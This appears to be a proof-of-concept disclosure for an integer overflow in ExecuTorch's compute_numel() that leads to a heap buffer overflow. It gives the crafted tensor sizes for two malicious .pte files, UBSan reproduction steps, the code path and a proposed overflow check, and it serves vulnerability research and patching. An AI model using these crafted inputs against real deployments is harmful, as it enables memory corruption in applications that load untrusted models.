# PoC: ExecuTorch `compute_numel()` Integer Overflow

- **CVE:** Pending
- **CWE:** CWE-190 (Integer Overflow) → CWE-122 (Heap Buffer Overflow)
- **Target:** pytorch/executorch
- **Severity:** High (CVSS 7.5)
- **Format:** `.pte` (FlatBuffer, identifier `ET12`)
## Vulnerability

`compute_numel()` in `runtime/core/portable_type/tensor_impl.cpp:41` performs unchecked signed integer multiplication when calculating the total number of elements in a tensor:

```cpp
ssize_t compute_numel(const TensorImpl::SizesType* sizes, ssize_t dim) {
  ssize_t numel = 1;
  for (const auto i : c10::irange(dim)) {
    numel *= sizes[i]; // NO OVERFLOW CHECK — signed overflow is UB
  }
  return numel;
}
```
Tensor dimensions are read from the `.pte` model file (FlatBuffer field `sizes: [int]`). A malicious file with crafted dimensions overflows the int64 multiplication, producing an incorrect `numel` that propagates to `nbytes()` → undersized memory allocation → heap buffer overflow.
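The wraparound can be modeled outside C++. Below is a minimal Python sketch of the vulnerable loop (Python ints are arbitrary-precision, so the two's-complement int64 wrap has to be emulated explicitly):

```python
def to_int64(x: int) -> int:
    """Reduce an arbitrary-precision int to two's-complement int64,
    mimicking what the unchecked C++ multiplication produces."""
    x &= (1 << 64) - 1
    return x - (1 << 64) if x >= (1 << 63) else x

def compute_numel_unchecked(sizes):
    """Python model of the vulnerable compute_numel() loop."""
    numel = 1
    for s in sizes:
        numel = to_int64(numel * s)  # wraps instead of raising
    return numel

# Dimensions from the two PoC files:
print(compute_numel_unchecked([2147483647, 2147483647, 3]))   # negative
print(compute_numel_unchecked([65536, 65536, 65536, 65536]))  # 0
```

This is a model of the arithmetic only, not of the ExecuTorch runtime; it reproduces exactly the two corrupted `numel` values that the PoC files trigger.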
## Files

| File | Description |
|---|---|
| `poc_executorch_numel_overflow.py` | Generator script — creates malicious `.pte` files and demonstrates the overflow |
| `poc_executorch_overflow.pte` | Crafted `.pte` — sizes `[2147483647, 2147483647, 3]` → `numel` overflows to negative |
| `poc_executorch_zero_numel.pte` | Crafted `.pte` — sizes `[65536, 65536, 65536, 65536]` → `numel` wraps to zero |
## Exploitation Variants

### Variant 1: Overflow to negative (`poc_executorch_overflow.pte`)

Sizes: `[2147483647, 2147483647, 3]`

```
Step 1: numel = 1 × 2147483647          = 2147483647
Step 2: numel = 2147483647 × 2147483647 = 4611686014132420609
Step 3: numel = 4611686014132420609 × 3 = OVERFLOW (> INT64_MAX)
```

UBSan output: `signed integer overflow: 4611686014132420609 * 3 cannot be represented in type 'long int'`
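The figures in the UBSan message can be verified directly in Python, where integers do not wrap and the overflow is visible as an out-of-range value:

```python
INT64_MAX = 2**63 - 1  # 9223372036854775807

step2 = 2147483647 * 2147483647  # fits in int64
step3 = step2 * 3                # exceeds INT64_MAX
assert step2 == 4611686014132420609 and step2 <= INT64_MAX
assert step3 > INT64_MAX

# Two's-complement wrap of the final product is negative:
wrapped = step3 - 2**64
print(step3, wrapped)
```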
### Variant 2: Overflow to zero (`poc_executorch_zero_numel.pte`)

Sizes: `[65536, 65536, 65536, 65536]`

```
Product: 65536⁴ = 2⁶⁴ → wraps to 0
nbytes  = 0 × element_size = 0
```

→ Zero-size allocation, but the tensor logically has 2⁶⁴ elements
→ ANY memory access is out-of-bounds
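The zero-wrap and the resulting zero-byte request can be checked the same way (the element size of 4 below is an illustrative assumption, e.g. float32):

```python
sizes = [65536, 65536, 65536, 65536]
product = 1
for s in sizes:
    product *= s
assert product == 2**64          # exactly one full wrap of int64

numel_wrapped = product % 2**64  # what the wrapped C++ int64 ends up holding
element_size = 4                 # illustrative: float32
nbytes = numel_wrapped * element_size
print(numel_wrapped, nbytes)     # 0 0 → zero-size allocation
```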
## Reproduction

```bash
# 1. Generate PoC files
pip install flatbuffers
python3 poc_executorch_numel_overflow.py

# 2. Build ExecuTorch with UBSan
git clone --depth 1 https://github.com/pytorch/executorch /tmp/executorch
cd /tmp/executorch && mkdir build && cd build
cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=undefined -fno-sanitize-recover=all -g"
make -j$(nproc) executor_runner

# 3. Load malicious model → UBSan fires
./executor_runner --model_path poc_executorch_overflow.pte
```
## Affected Code Path

```
Malicious .pte → Program::load() → Method::init() → parseTensor()
  → tensor_parser_portable.cpp:157 → new TensorImpl(sizes)
  → compute_numel(): numel *= sizes[i]   ← OVERFLOW
  → nbytes(): numel_ × elementSize       ← wrong value
  → getTensorDataPtr(nbytes)             ← undersized alloc
  → kernel execution → HEAP BUFFER OVERFLOW
```
## Fix

The same codebase already has `c10::mul_overflows()` (used in `method_meta.cpp`) — the same check just needs to be applied here:

```cpp
ssize_t new_numel;
ET_CHECK_MSG(
    !__builtin_mul_overflow(numel, sizes[i], &new_numel),
    "Integer overflow in numel at dim %zd", i);
numel = new_numel;
```
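The semantics of the guard can be sketched in Python — a model of `__builtin_mul_overflow` for int64, not the ExecuTorch implementation:

```python
INT64_MIN, INT64_MAX = -2**63, 2**63 - 1

def mul_overflow_i64(a: int, b: int):
    """Model of __builtin_mul_overflow for int64:
    returns (overflowed, wrapped_result)."""
    exact = a * b
    overflowed = not (INT64_MIN <= exact <= INT64_MAX)
    wrapped = ((exact + 2**63) % 2**64) - 2**63  # two's-complement wrap
    return overflowed, wrapped

def compute_numel_checked(sizes):
    """compute_numel() with the proposed guard applied:
    reject the shape instead of silently wrapping."""
    numel = 1
    for i, s in enumerate(sizes):
        overflowed, numel = mul_overflow_i64(numel, s)
        if overflowed:
            raise OverflowError(f"Integer overflow in numel at dim {i}")
    return numel
```

With this guard, `compute_numel_checked([2147483647, 2147483647, 3])` raises at dim 2, while valid shapes pass through unchanged.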